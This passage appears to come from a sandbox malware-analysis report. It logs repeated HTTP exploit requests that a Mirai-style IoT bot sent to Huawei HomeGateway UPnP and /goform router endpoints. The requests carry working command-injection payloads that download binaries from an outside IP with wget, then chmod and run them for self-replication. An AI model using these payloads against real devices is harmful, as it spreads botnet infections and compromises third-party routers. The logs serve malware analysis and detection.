s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
